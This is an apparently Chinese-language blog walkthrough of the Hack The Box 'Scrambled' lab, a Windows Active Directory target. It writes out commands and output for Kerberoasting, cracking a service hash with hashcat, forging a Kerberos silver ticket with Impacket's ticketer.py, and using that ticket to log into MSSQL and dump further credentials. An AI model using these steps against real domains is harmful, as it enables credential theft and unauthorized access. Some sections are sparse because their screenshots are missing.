HTB-Scrambled

于 2024-06-01 14:15:33 发布
阅读量806 收藏 23
点赞数 28
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2201_75378806/article/details/139373128
版权

初始权限获得

端口扫描

访问80

大致浏览一下

知道NTLM 身份验证已禁用,且有个截图泄露了用户名 ksimpson

/salesorders.html有关于“销售订单应用程序”的详细信息,该应用程序确认了主机名/域名nmap`,还指出了 TCP 4411 的用途:

我注意到有一个选项“启用调试日志记录”。

  • passwords.html说:

    密码重置

    我们的自助密码重置系统将很快启动并运行,但在此期间,请致电 IT 支持热线,我们将重置您的密码。如果没有人接听,请留言说明您的用户名,我们将重置您的密码,使其与用户名相同。

目录爆破

feroxbuster -u http://10.10.11.168 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt

在没有凭据的情况下顺便看看ldap

ldapsearch -h 10.10.11.168 -x -s base namingcontexts

smbclient行不通,我也没法使用crackmapexec

smbclient.py使用

利用impacket的

smbclient.py -k scrm.local/ksimpson:ksimpson@dc1.scrm.local -dc-ip dc1.scrm.local

smbclient -U LicorDebellota.htb/kaorz

//10.129.228.115/netlogon

help给出命令:

shares显示目录:

大多数没办法访问

use public

get Network Security Changes.pdf

pdf李米娜再次提到 NTLM 由于 NTLM 中继攻击而被禁用,现在一切都是通过 Kerberos 完成的。它还提到,人力资源部门已删除 SQL 数据库的访问权限。

应为ntlm认证被禁止,利用kerbore,

GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-host dc1.scrm.local -request -k

获得sqlsvc的凭证

hashcat mssqlsvc-hash /usr/share/wordlists/rockyou.txt

Pegasus60

银票

这些信用实际上并不能直接允许我接触到任何新的东西。但因为这个帐户正在运行 SQL 服务,所以我可以使用该密码来执行Silver Ticket 攻击。adsecurity.org 链接的概述非常好。Silver Ticket 是伪造的 TGS(票证授予服务)票证,直接在客户端和服务之间使用,无需经过 DC。相反,TGS 票证是由服务帐户本身签名的,因此银票证仅限于仅验证服务本身。

要创建银票,攻击者需要:

  1. 服务帐户密码的 NTLM 哈希值;

  2. 域的SID

  3. 与帐户关联的服务主体名称 (SPN)。

GetUserSPNS.py我已经通过上面获得了 SPN MSSQLSvc/dc1.scrm.local:1433

要获取密码“Pegasus60”的 NTLM 哈希值,我将使用这篇文章中的命令:

密码转换银票hash

oxdf@hacky$ iconv -f ASCII -t UTF-16LE <(printf "Pegasus60") | openssl dgst -md4

(stdin)= b999a16500b87d17ec7f2e2a68778f05

接下来获取域sid,第一个方法我不知道/etc/ldap/ldap.conf在哪

后面想弄再来看看

利用ldap转储sid,如何排除故障

要获取域 SID,我需要连接回 LDAP,但需要经过身份验证。需要进行大量的故障排除和搜索才能使其正常工作(感谢 TheCyberGeek 提供了一些关于此问题的提示)。如果我尝试以 ksimpson 身份连接,则会收到有关需要 SSL/TLS 的错误:

oxdf@hacky$ ldapsearch -h dc1.scrm.local -D ksimpson@scrm.local -w ksimpson -b "DC=scrm,DC=local" "(objectClass=user)"
ldap_bind: Strong(er) authentication required (8)
        additional info: 00002028: LdapErr: DSID-0C090259, comment: The server requires binds to turn on integrity checking if SSL\TLS are not already active on the connection, data 0, v4563

我需要下载服务器证书才能启用此连接:

oxdf@hacky$ openssl s_client -connect dc1.scrm.local:636
CONNECTED(00000003)
depth=0 CN = DC1.scrm.local
verify error:num=20:unable to get local issuer certificate
verify return:1         
depth=0 CN = DC1.scrm.local           
verify error:num=21:unable to verify the first certificate
verify return:1                                        
---                                                       
Certificate chain
 0 s:CN = DC1.scrm.local                           
   i:DC = local, DC = scrm, CN = scrm-DC1-CA
---                              
Server certificate
-----BEGIN CERTIFICATE-----
MIIGHDCCBQSgAwIBAgITEgAAAAIJqKDU0Cj0DgAAAAAAAjANBgkqhkiG9w0BAQUF
...[snip]...
G6CIrcE0+XepleMQggP4zOUbTO01AUmq7eX2z031RE4ndrCtgBXuGSHDqnUSvmVN
N6T9KeVeLFfbxp6gyHA3ehMBKrkbp3iLAWiWptbdIHE=
-----END CERTIFICATE-----
...[snip]...

我将获取该证书并将其保存到文件中。我可以用一行代码做到这一点:

oxdf@hacky$ echo -n | openssl s_client -connect dc1.scrm.local:636 | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > ldapserver.pem
depth=0 CN = DC1.scrm.local
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 CN = DC1.scrm.local
verify error:num=21:unable to verify the first certificate
verify return:1
DONE

现在我将编辑/etc/ldap/ldap.conf以指出这一点:

#
# LDAP Defaults
#
​
# See ldap.conf(5) for details
# This file should be world readable but not world writable.
​
#BASE   dc=example,dc=com
#URI    ldap://ldap.example.com ldap://ldap-master.example.com:666
​
#SIZELIMIT      12
#TIMELIMIT      15
#DEREF          never
​
# TLS certificates (needed for GnuTLS)
TLS_CACERT      /home/oxdf/hackthebox/scrambled-10.10.11.168/ldapserver.pem

ldapsearch现在将转储所有用户:

oxdf@hacky$ ldapsearch -h dc1.scrm.local -Z -D ksimpson@scrm.local -w ksimpson -b "DC=scrm,DC=local" "(objectClass=user)" 
# extended LDIF
#
# LDAPv3
# base <DC=scrm,DC=local> with scope subtree
# filter: (objectClass=user)
# requesting: ALL
#
...[snip]...
# Administrator, Users, scrm.local
dn: CN=Administrator,CN=Users,DC=scrm,DC=local
...[snip]...                         
objectSid:: AQUAAAAAAAUVAAAAhQSCo0F98mxA04uX9AEAAA==
...[snip]...                        

我需要字符串形式的 SID,因此我将使用此博客和一些 Python 来编写转换器:

#!/usr/bin/env python3
​
import base64
import struct
import sys
​
b64sid = sys.argv[1]
binsid = base64.b64decode(b64sid)
a, N, cccc, dddd, eeee, ffff, gggg = struct.unpack("BBxxxxxxIIIII", binsid)
bb, bbbb = struct.unpack(">xxHIxxxxxxxxxxxxxxxxxxxx", binsid)
bbbbbb = (bb << 32) | bbbb
​
print(f"S-{a}-{bbbbbb}-{cccc}-{dddd}-{eeee}-{ffff}-{gggg}")

有用:

oxdf@hacky$ python sid.py  AQUAAAAAAAUVAAAAhQSCo0F98mxA04uX9AEAAA==
S-1-5-21-2743207045-1827831105-2542523200-500
第二种办法找sid

获取域 SID 的另一种(且更简单)方法是使用getPac.pyImpacket 中的脚本。该脚本旨在获取任何用户的权限属性证书,这只需要作为域中的用户进行身份验证。我将给它 ksimpson 的权限并询问管理员:

oxdf@hacky$ getPac.py -targetUser administrator scrm.local/ksimpson:ksimpson

Domain SID: S-1-5-21-2743207045-1827831105-2542523200

有大量有关该帐户的信息,但就我当前的目的而言,最后一项(在末尾看似随机的十六进制之前)是域 SID。

生成票据并且导入环境

ticketer.py -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -dc-ip dc1.scrm.local -spn MSSQLSvc/dc1.scrm.local:1433 administrator

在 Linux 上,Kerberos 在预定义的位置查找票证,例如环境变量/tmp/krb5cc_[uid of current user]指向的任何文件KRB5CCACHE。如果我只是运行klist,它将无法找到新票:

oxdf@hacky$ klist 
klist: No credentials cache found (filename: /tmp/krb5cc_1000)

如果我将 env 变量指向 from 的文件ticketer.py,它会显示有关票证的信息:

oxdf@hacky$ KRB5CCNAME=administrator.ccache klist
Ticket cache: FILE:administrator.ccache
Default principal: administrator@SCRM.LOCAL
​
Valid starting       Expires              Service principal
06/14/2022 18:44:15  06/14/2032 18:44:15  MSSQLSvc/dc1.scrm.local:1433@SCRM.LOCAL
        renew until 06/14/2032 18:44:15

使用相同的方法,mssqlclient.py可以使用票证连接到数据库:

oxdf@hacky$ KRB5CCNAME=administrator.ccache mssqlclient.py -k dc1.scrm.local
Impacket v0.9.25.dev1+20220119.101925.12de27dc - Copyright 2021 SecureAuth Corporation
​
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL>

数据库枚举

select name, database_id from sys.databases;

ScrambleHR看起来很有趣。它有三个表:

SELECT TABLE_NAME FROM ScrambleHR.INFORMATION_SCHEMA.TABLES;

和表都是空的EmployeesTimesheets其中有一行UserImport

SELECT * from ScrambleHR.dbo.UserImport;

MiscSvc ScrambledEggs9900

MSSQL 能够通过xp_cmdshell存储过程运行命令。在这里可以这样做,但是服务帐户无法访问盒子上的大部分内容,这在很大程度上是一个死胡同。

linux上安装powershell

Installing PowerShell on Ubuntu - PowerShell | Microsoft Learn

后续的反序列化和代码逆向看

HTB: Scrambled [From Linux] | 0xdf hacks stuff

kikifofo
关注
HTB靶场系列 Linux靶机 Bashed靶机
m0_57221101的博客
01-10 1413
勘探 惯例先用nmap扫描一下端口,发现开了80端口 ┌──(root????Mr)-[~/dirsearch] └─# nmap 10.10.10.68 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-12 14:30 CST Nmap scan report for 10.10.10.68 Host is up (1.2s latency). Not shown: 999 closed ports PORT STATE SERVICE 80/
HTB-Chemistry靶机渗透教程,RCE,aiohttp系统目录遍历,导致权限提升
xt350488的博客
11-28 664
各种晶体、材料计算处理软件,如Vesta,Diamond,GSAS,Mercury,Rasmal,Materials Studio等都以晶体信息文件作为输入或者输出结果。CVE-2024-23334 aiohttp 3.9.1 的目录遍历漏洞导致系统中的ssh密匙被读取,从而由普通用户的权限,上升到root权限,要么禁用密匙登录,就可以防范。有了第三个用户的密码可以猜测刚刚的22端口,进行ssh连接,登录成功(如果不能连的话直接在反弹的shell直接su切换用户)上传任意文件,这个文件上传的方法不管用。
【Hack The Box】windows练习-- Scrambled
人间体佐菲的博客
11-18 724
【Hack The Box】windows练习-- Scrambled
ldap服务器配置信息错误,客户域控启用了LDAP服务器签名要求导致配置域信息失败...
weixin_33787865的博客
07-31 1467
【故障类型】:配置域信息失败【关 键 词】:ldap,域策略【适用版本】:FusionCloud Solution V100R006C00【问题现象】:在FusionAccess上添加客户的域信息失败,提示如下:【告警信息】:无【问题分析】:检查ITA的日志,发现有如下错误提示:LDAPException(resultCode=8 (strongauth required), errorMessa...
HTB-Escape
TA不懒,但还没有添加简介
05-28 1014
HTB-Escape
IPSEC与SSL/TLS的比较 (转)
热门推荐
Better Me的博客
02-03 1万+
认证方式就是采用AH头,加密方式就是采用ESP头 AH头结构 AH协议为IP通信提供数据源认证、数据完整性和反重播保证,它能保护通信免受篡改,但不能防止窃听,适合用于传输非机密数据。AH的工作原理是在每一个数据包上添加一个身份验证报头。此报头包含一个带密钥的hash散列(可以将其当作数字签名,只是它不使用证书),此hash散列在整个数据包中计算,因此对数据的任何更改将致使散
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
htb-beep
m0_55772907的博客
09-15 1056
一般
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
HTB-Recon:Hackthebox计算机的自动侦查脚本(hackthebox.eu)
03-09
例如: ./htb-recon.sh 10.10.10.10. ServMon Windows ./htb-recon.sh 10.10.10.10. ServMon Windows 然后通过tmux a -t htb_recon附加会话 它能做什么 在您的主目录中创建一个工作区。 创建不同的文件夹以使事情...
Enabling SSL or TLS in Oracle E-Business Suite Release 12
苏南生的优快云博客
06-16 1万+
Enabling SSL or TLS in Oracle E-Business Suite Release 12 In This Document Section 1: IntroductionSection 2: Concepts and TerminologySection 3: Application Tier SetupSection 4: Database Tier Set
基础连接已经关闭: 未能为 SSL/TLS 安全通道建立信任关系
weixin_30408675的博客
08-31 874
英文:The underlying connection was closed: Could not establish trust relationship for the SSL/TLS secure channel 使用HttpWebRequest 访问 https://mapi.alipay.com/gateway.do?...支付宝接口时 在本机WIN10 64位环境 完全没问题,使用...
HTTP到HTTPS——申请SSL证书并安装过程中踩到的坑
时梦的博客
09-05 1万+
本文记录了我在把网站从HTTP升级到 HTTPS ,申请和安装SSL证书路上踩过的几个坑。 安装环境: 操作系统:centos 6 X64 SSL证书来源:Let's Encrypt 安装用脚本:acme.sh 服务器:apache2 我的安装用的脚本,最好分步执行,以免出现问题后仍然尝试安装过期的证书 #!/bin/sh #获得脚本并执行 curl https://get.acme.s...
SSL/TLS
xymyeah
04-23 3459
  SSL/TLSSecure Sockets Layer is defined by NetscapeCommunications Corporation for securing HTTP connections. Because SSLis implemented in Netscapes browsers, it has become a de factostanda
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8708
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络上的人际交往.ppt
05-31
网络上的人际交往.ppt
利用Revit软件进行智能检查管线净高的方法.docx
06-01
利用Revit软件进行智能检查管线净高的方法.docx
MATLAB环境下PSS仿真模型电力系统振荡模式测试研究
最新发布
06-01
《基于MATLAB的PSS仿真模型的电力系统振荡模式测试研究》是我的毕业论文课题。经过几个星期的辛勤搭建与调试,我终于完成了这个模型,现在我已经顺利毕业啦。这个模型是基于MATLAB 7.1版本开发的。希望它能够为大家提供便利。对了,我是南工程的,不知道学弟学妹们有没有看到这篇帖子,希望它能对你们有所帮助,哈哈。
基于卷积神经网络的调制信号识别算法
05-31
In this study, we explore the cutting-edge developments in machine learning using deep neural networks, specifically applying them to the task of radio modulation recognition. Utilizing the Keras framework with TensorFlow as the backend and the GitHub universal dataset, our research demonstrates that the performance of radio modulation recognition is not constrained by the depth of the neural network. Instead, future efforts should concentrate on enhancing the synchronization and equalization capabilities learned by the models. Breakthroughs in these areas are expected to arise from either innovative neural network architectures tailored for these tasks or through the development of novel training techniques.
nxc ldap escapetwo.htb -d sequel.htb -u 'rose' -p 'KxEPkKe6R8su' --users
04-08
在此场景下,假设目标 IP 地址为 `10.10.10.10`,并提供给定的凭证 `rose/KxEPkKe6R8su` 和域名称 `sequel.htb`,完整的命令如下所示: ```bash nxc ldap 10.10.10.10 -u rose -p KxEPkKe6R8su --domain sequel.htb...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值